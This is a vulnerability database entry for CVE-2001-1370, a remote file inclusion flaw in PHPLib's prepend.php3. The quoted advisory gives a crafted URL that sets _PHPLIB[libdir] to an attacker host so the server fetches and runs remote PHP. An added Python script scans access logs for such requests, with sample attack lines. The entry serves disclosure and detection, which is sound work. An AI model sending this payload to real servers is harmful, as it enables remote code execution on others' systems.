PHPLib prepend.php3 Script Execution Vulnerability


Vulnerability ID: 1106440
Vulnerability type: Unknown
Published: 2001-07-21
Updated: 2005-05-02
CVE ID: CVE-2001-1370
CNNVD-ID: CNNVD-200107-148
Platform: PHP
CVSS score: 10.0
|Vulnerability Source
https://www.exploit-db.com/exploits/21022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-148
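|Vulnerability Details
prepend.php3 in PHPLib versions before 7.2d is vulnerable when register_globals is enabled in PHP. A remote attacker can execute arbitrary scripts by sending an HTTP request that modifies $_PHPLIB[libdir] so that it points to malicious code on another server. Affected software includes Horde 1.2.5 and earlier, IMP 2.2.6 and earlier, and other packages that use PHPLib.
|Exploit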
source: http://www.securityfocus.com/bid/3079/info

The PHP Base Library ('PHPLIB') is a code library which provides support for session management in web applications. It is targeted to developers and is widely used in many web applications, so a strong possibility exists that an application may be using it without the knowledge of the administrator.

A problem in PHPLIB will allow remote attackers to submit malicious input in web requests that will cause the application to fetch and then execute scripts from another host.

This may allow attackers to gain local access to the web server.

If $_PHPLIB[libdir] is a string whose value is "http://attacker.com/", this instruction will be executed:

require("http://attacker.com/" . "db_mysql.inc");

Thus, simply crafting a URL like:

http://victim.com/any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/

will make the script 'page.php' (which the attacker knows is based on the PHPLIB toolkit) include and execute any arbitrary PHP instructions contained in a file named 'db_mysql.inc'.
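
To check whether a server has received requests of this shape, the following added example (not part of the original advisory or of PHPLIB) scans access-log lines for query parameters that write into `_PHPLIB[...]`. The log format, the severity labels, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Request target inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A request parameter that register_globals would copy into $_PHPLIB[...].
PARAM_RE = re.compile(r'^_PHPLIB\[(\w+)\]$')
# A value that require() would fetch from another host via a URL wrapper.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def classify(log_line):
    """Return (severity, key, value) for one log line, or None if clean."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    query = m.group(1).partition("?")[2]
    finding = None
    # parse_qsl percent-decodes, so _PHPLIB%5Blibdir%5D is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        pm = PARAM_RE.match(name)
        if not pm:
            continue
        if pm.group(1) == "libdir" and REMOTE_RE.match(value):
            return ("high", "libdir", value)  # remote include attempt
        # Any other request-supplied write into $_PHPLIB is still suspect.
        finding = finding or ("medium", pm.group(1), value)
    return finding

def scan(lines):
    """Return [(line_number, severity, key, value)] for flagged lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify(line)
        if result:
            hits.append((n, *result))
    return hits

# Constructed sample log lines (not taken from any real server).
SAMPLE = [
    '192.0.2.10 - - [21/Jul/2001:10:00:00 +0000] "GET /any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/ HTTP/1.0" 200 512',
    '192.0.2.11 - - [21/Jul/2001:10:00:05 +0000] "GET /page.php?_PHPLIB%5Blibdir%5D=ftp%3A%2F%2Fattacker.example%2F HTTP/1.0" 200 512',
    '192.0.2.12 - - [21/Jul/2001:10:00:09 +0000] "GET /index.php?page=2 HTTP/1.0" 200 1024',
    '192.0.2.13 - - [21/Jul/2001:10:00:12 +0000] "GET /page.php?id=1&_PHPLIB[libdir]=/tmp/ HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Access logs record only the query string, so values supplied in a POST body or a cookie, which register_globals also imports, are not visible to this check.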
|References

Source: BID
Name: 3079
Link: http://www.securityfocus.com/bid/3079
Source: DEBIAN
Name: DSA-073
Link: http://www.debian.org/security/2001/dsa-073
Source: BUGTRAQ
Name: 20010726 TSLSA-2001-0014 - PHPLib
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=99616122712122&w=2
Source: BUGTRAQ
Name: 20010722 [SEC] Hole in PHPLib 7.2 prepend.php3
Link: http://www.securityfocus.com/archive/1/198768
Source: XF
Name: phplib-script-execution(6892)
Link: http://www.iss.net/security_center/static/6892.php
Source: BUGTRAQ
Name: 20010721 IMP 2.2.6 (SECURITY) released
Link: http://online.securityfocus.com/archive/1/198495
Source: CONECTIVA
Name: CLA-2001:410
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000410
Source: CALDERA
Name: CSSA-2001-027.0
Link: ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2001-027.0.txt
